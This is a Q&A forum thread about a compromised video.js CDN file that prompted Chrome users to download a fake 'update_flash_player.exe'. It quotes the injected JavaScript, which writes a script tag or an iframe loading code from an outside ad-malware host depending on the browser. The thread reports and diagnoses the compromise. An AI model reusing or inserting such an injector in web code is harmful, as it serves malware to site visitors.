# malware update_flash_player.exe found in http://vjs.zencdn.net/c/video.js?ver=3.5.1

Tags: javascript, internet-explorer, google-chrome, video.js, malware

While browsing some web sites with Chrome I got prompted to download a file:

- update_flash_player.exe

No problem with Safari and Firefox, only Chrome. My platform is Mac.

I inspected the page source and I think I found malicious code in the following script:

- http://vjs.zencdn.net/c/video.js?ver=3.5.1

The code I think it's maliciuos:

```
if(navigator.appVersion.indexOf("MSIE")!=-1){ 
document.write('<script src="http://cdn.adsbarscipt.com/links/jump/"></script>');
}
if(navigator.appVersion.indexOf("Chrome")!=-1){ 
document.write('<iframe src="http://cdn.adsbarscipt.com/links/flash/?updnew" width="200"    height="200"></iframe>');
}
```

My question is: where can I find a clean version of the script?

EDIT

As pointed out in the comments, the author of the script has cleaned it, it's safe now.

Comment: I reworded it, is it ok? thanks

Comment: Reworded it again, hope it's clearer now.

Answer (score 1, accepted):

I would have added this as a comment but I don't have enough reputation.

It looks like video.js have posted a blog about the problem:
http://blog.videojs.com/post/61309840958/unauthorized-modification-of-video-js-cdn-files

A number of their files were affected but they say they've fixed the problem now.

Comment: good point but it's still infected, try for yourself: http://vjs.zencdn.net/c/video.js?ver=3.5.1 (look at last 6 lines)

Comment: you're right, it's clean now, it was in my local cache